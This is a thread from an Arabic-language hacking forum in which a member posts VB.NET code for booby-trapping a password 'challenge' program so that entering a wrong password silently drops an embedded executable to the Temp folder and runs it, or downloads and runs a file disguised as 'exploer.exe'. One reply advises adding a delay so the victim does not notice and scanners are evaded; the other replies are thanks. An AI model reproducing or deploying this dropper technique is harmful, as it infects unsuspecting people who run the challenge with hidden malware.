1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : جـعـفـر الـشـمـري | المشاهدات : 765 | الردود : 28
  1. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    [​IMG]
    كيف حالكم اعضاء وزوار عراق تيم
    اليوم موضوعي عن فكرة تلغيم بسيطة تفيد بالتحديات كيف ؟
    مثلا تعمل تحدي دوت نت
    الا بدخول الباسورد يعمل مثلا او تضهر الرسالة او عمل استخراج الباسورد


    فكرة التلغيم سوف تعمل اذا ادخل باسورد خطأ يشتغل السيرفر ^_^


    [​IMG]


    نضع textbox1 و button1
    نضغط دبل كليك على button1
    ونكتب
    كود:
     If TextBox1.Text = "1234" Then
           ("MsgBox("jaffar
            Else
              ("MsgBox("jaffarhassan
    
    
            End If
    
    
    *=== تحديد كود ===*

    [​IMG]
    الكود واضح اذا ادخلنا الباسورد صحيح يشتغل مسج بوكس واذا خطأ هم مسج بوكس لكن انت ضع بمكان المسج بوكس كود استدعاء السيرفر من الريسورس


    كود:
    On Error Resume Next
            Dim Dir As String = My.Computer.FileSystem.SpecialDirectories.Temp
            Dim Filename As String = Dir + "ff.exe"
            IO.File.WriteAllBytes(Filename, My.Resources.ff)
            Process.Start(Filename)
    
    *=== تحديد كود ===*
    [​IMG]


    او استخدم كود داونلودر




    كود:
                Dim web As New System.Net.WebClient
                web.DownloadFile("???? ??????", Environ("tmp") & "/exploer.exe")
                Shell(Environ("tmp") & "/exploer.exe")
    
    *=== تحديد كود ===*


    [​IMG]
    تستطيع ان تشفر الباسورد بخوارزميات قوية


    وان تحمي البرنامج بحمايات قوية لكي يصعب عليه استخراج الباسورد والفكرة حلوة يعن انه مشغول بحل التحدي واذا ادخل الباسورد خطأ يشتغل السيرفر ^_~
    [​IMG]




    اتمنى ان ينال اعجابكم


    [​IMG]




     
  2. سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    701
    الإعجابات المتلقاة:
    48
    نقاط الجائزة:
    75
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    وعليكم السلام احسنت حبيبي لكن فقد شغله بسيطه اذا كان السيرفر يشتغل مباشرا راح يشك انو الضحيه بان سيرفر اشتغل الا اذا ان عملت له سليب اعتقد يتخطى الفاحص احسنت ولاتحرمنا


    )4:")4:"​
     
  3. ✶ s c я є α м IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    681
    الإعجابات المتلقاة:
    701
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    رد: فكرة تلغيم بسيطة

    الف شكر لك فكرة رائعة تسلم ع الطرررح {1!9}
     
  4. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: فكرة تلغيم بسيطة

    أحسنت جعفر . بارك الله بيك
     
  5. Mira Mrmr .::|| زهره منتدى عراق تيم ||::. مشرفات المنتدى

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    696
    الإعجابات المتلقاة:
    149
    نقاط الجائزة:
    105
    الجنس:
    أنثى
    الإقامة:
    Baghdad
    نظام التشغيل:
    windows 8.1
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    [​IMG]فكره حلؤه عاشت ايدك[​IMG]
     
  6. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    انت العايش حبيبي علاوي


    صحيح فكرتك نورتني,وشكرا على المرور :lolًٌُ:ٌ
     
  7. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    نورتني اخوية وشكرا على المرور {3$0}
     
  8. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    احسن الله اليك اخوية


    نورت
     
  9. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: فكرة تلغيم بسيطة

    ايدج العايشة نورتي اختي
     
  10. Bad Man موقوف لمخالفة الشروط

    الأنتساب:
    ‏8 أغسطس 2015
    المشاركات:
    59
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: فكرة تلغيم بسيطة

    بارك الله بيك
     

مشاركة هذه الصفحة